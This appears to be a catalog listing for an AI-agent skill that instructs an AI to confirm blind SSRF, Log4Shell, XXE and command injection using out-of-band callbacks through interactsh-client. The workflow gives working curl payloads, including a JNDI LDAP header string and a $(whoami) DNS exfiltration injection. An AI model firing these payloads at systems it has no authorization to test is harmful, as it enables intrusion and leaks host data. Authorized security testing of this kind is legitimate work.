Out-Of-Band (OAST) Blind Testing Skill
SkillDev toolsGenerates Out-of-Band (OAST) interaction payloads with interactsh-client to detect and confirm Blind SSRF, Blind RCE, and Out-of-Band data leakage.
Available today. Use it from your connected AI after setup.
No other account needed.
Connect ahel once, and every AI you use reads what you have installed.
Then ask your AI: use the Out-Of-Band (OAST) Blind Testing Skill skill
What this skill tells your AI
The instructions your AI receives, as published by zyrexnn/cybermes in skills/oast-blind-testing/SKILL.md and read by ahel’s review.
Purpose
Confirm high-severity asynchronous and blind vulnerabilities (Blind Server-Side Request Forgery, Blind Command Injection, Log4Shell, Blind XML External Entity) by listening for external DNS, HTTP, and SMTP callbacks using interactsh-client.
Inputs
- Candidate SSRF parameters from
/workspace/output/parameters/<target>/ssrf.txt - Live web services from
/workspace/recon/<target>/httpx_live_*.txt
Workflow
1. Register OAST Session (interactsh-client)
Start an interactive or background interactsh-client session to obtain a unique listening domain:
# Generate a dedicated session and capture interaction logs
interactsh-client -v -json -o /workspace/output/oast_interactions.json &
INTERACT_PID=$!
sleep 3
(Alternatively, run single-shot poll mode after payload injection).
2. Inject Payloads across Common Blind Vectors
A. Blind SSRF in Parameters:
Inject the unique callback domain into identified query/body parameters:
CALLBACK_DOMAIN="<unique-subdomain>.oast.fun"
# Test HTTP & DNS callback
curl -s -m 5 "https://target.com/fetch?url=http://${CALLBACK_DOMAIN}/ssrf-test" || true
curl -s -m 5 "https://target.com/api/webhook" \
-X POST \
-H "Content-Type: application/json" \
-d "{\"webhook_url\":\"http://${CALLBACK_DOMAIN}/webhook-test\"}" || true
B. Blind Header Injection (Log4j / Blind SSRF):
Inject callback domains into HTTP request headers:
curl -s -m 5 "https://target.com/" \
-H "X-Forwarded-For: ${CALLBACK_DOMAIN}" \
-H "X-Real-IP: ${CALLBACK_DOMAIN}" \
-H "Referer: http://${CALLBACK_DOMAIN}/ref" \
-H "User-Agent: \${jndi:ldap://${CALLBACK_DOMAIN}/log4j}" || true
C. Blind Command Injection (DNS Exfiltration):
Test out-of-band ping / nslookup commands:
curl -s -m 5 "https://target.com/api/lookup?host=\$(whoami).${CALLBACK_DOMAIN}" || true
3. Verification & Callback Inspection
Check /workspace/output/oast_interactions.json for incoming DNS queries (protocol: "dns") or HTTP requests (protocol: "http").
# Parse recorded interactions
grep -E '(dns|http)' /workspace/output/oast_interactions.json || true
Output Artifacts
/workspace/output/oast_interactions.json- Raw interaction callback logs containing client IP, protocol, and request headers./workspace/reports/oast_findings.md- Confirmed blind vulnerability Proof of Concept.
Safety Rules
- Include target identifier in the URL path (e.g.
http://<token>.oast.fun/target-id-123) to definitively attribute the callback. - Never use external callbacks for denial-of-service or flooding.
Signals
- GitHub stars
- 790
- Forks
- 138
- Last commit
- Sep 2026
Advanced
- Catalog kind
- skill
- Gateway key
oast-blind-testing- Source
- github.com/zyrexnn/cybermes